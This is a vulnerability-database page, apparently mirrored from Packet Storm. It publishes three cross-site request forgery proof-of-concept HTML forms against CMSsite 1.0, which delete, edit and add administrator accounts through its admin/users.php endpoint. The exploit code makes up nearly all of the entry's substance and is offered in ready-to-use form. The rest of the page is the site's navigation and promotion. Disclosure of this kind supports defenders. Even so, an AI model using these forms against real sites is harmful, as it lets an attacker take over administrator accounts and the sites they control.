Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CMSsite 1.0 Cross Site Request Forgery

🗓️ 01 Mar 2019 00:00:00Reported by Mr Winst0nType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 116 Views

CMSsite 1.0 Cross-Site Request Forgery vulnerabilities include deletion, editing, and addition of admin users

Code
`# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Delete Admin)  
# Exploit Author: Mr Winst0n  
# Author E-mail: manamtabeshekan[@]gmail[.]com  
# Discovery Date: March 1, 2019  
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite  
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip  
# Tested Version: 1.0  
# Tested on: Kali linux, Windows 8.1   
  
# PoC:  
  
<!doctype html>  
<html>  
<head>  
<title>Delete Admin</title>  
</head>  
<body>  
<form method="post" action="http://localhost/[PATH]/admin/users.php?del=1">  
<input type="submit" value="Delete">  
</form>   
</body>  
</html>  
  
  
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Edit Admin)  
# Exploit Author: Mr Winst0n  
# Author E-mail: manamtabeshekan[@]gmail[.]com  
# Discovery Date: March 1, 2019  
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite  
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip  
# Tested Version: 1.0  
# Tested on: Kali linux, Windows 8.1   
  
# PoC:  
  
<!doctype html>  
<html>  
<head>  
<title>Edit Admin</title>  
</head>  
<body>  
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=edit_user&u_id=10" method="POST" enctype="multipart/form-data" >  
  
<!-- You can change u_id value -->  
  
<div class="form-group">  
<label for="user_title">User Name</label>  
<input type="text" name="user_name" required>  
</div><br>  
  
<div class="form-group">  
<label for="user_author">FirstName</label>  
<input type="text" name="user_firstname" required>  
</div><br>  
  
<div class="form-group">  
<label for="user_status">LastName</label>  
<input type="text" name="user_lastname" required>  
</div><br>  
  
<div class="input-group">  
<select name="user_role" id="">  
<label for="user_role">Role</label>  
<option value='User'>Admin</option>  
<option value='User'>User</option>  
</select>  
  
</div><br>  
<div class="form-group">  
<label for="post_image">User Image</label>  
<input type="file" name="user_image">  
</div><br>  
  
<div class="form-group">  
<label for="user_tag">Email</label>  
<input type="email" name="user_email" class="form-control"required>  
</div><br>  
  
<div class="form-group">  
<label for="user_tag">Password</label>  
<input type="password" name="user_password" required>  
</div><br>  
<hr>  
  
<button type="submit" name="update_user" value="Update User">Update User</button>  
  
</form>  
</body>  
</html>  
  
  
  
# Exploit Title: CMSsite 1.0 - Cross-Site Request Forgery (Add Admin)  
# Exploit Author: Mr Winst0n  
# Author E-mail: manamtabeshekan[@]gmail[.]com  
# Discovery Date: March 1, 2019  
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite  
# Software Link : https://github.com/VictorAlagwu/CMSsite/archive/master.zip  
# Tested Version: 1.0  
# Tested on: Kali linux, Windows 8.1   
  
# PoC:  
  
<html>  
<head>  
<title>Add Admin</title>  
</head>  
<body>  
<form role="form" action="http://localhost/[PATH]/admin/users.php?source=add_user" method="POST" enctype="multipart/form-data">  
  
<div class="form-group">  
<label for="user_title">User Name</label>  
<input type="text" name="user_name" required><br><br>  
</div>  
  
<div class="form-group">  
<label for="user_author">FirstName</label>  
<input type="text" name="user_firstname" required><br><br>  
</div>  
  
<div class="form-group">  
<label for="user_status">LastName</label>  
<input type="text" name="user_lastname" required><br><br>  
</div>  
  
<div class="form-group">  
<label for="user_image">Image</label>  
<input type="file" name="user_image" required><br><br>  
</div>  
<div class="input-group">  
<select name="user_role" id="">  
<label for="user_role">Role</label>  
<option value='Admin'>Admin</option><option value='User'>User</option>  
</select><br><br>  
</div>  
<div class="form-group">  
<label for="user_tag">Email</label>  
<input type="email" name="user_email" required><br><br>  
  
</div>  
<div class="form-group">  
<label for="user_tag">Password</label>  
<input type="password" name="user_password" required><br><br>  
</div>  
  
<button type="submit" name="create_user" value="Add User">Add User</button>  
  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Mar 2019 00:00Current
0.5Low risk
Vulners AI Score0.5
cmssite 1.0cross-site request forgerydelete adminedit adminadd adminweb application securityvulnerability exploit
116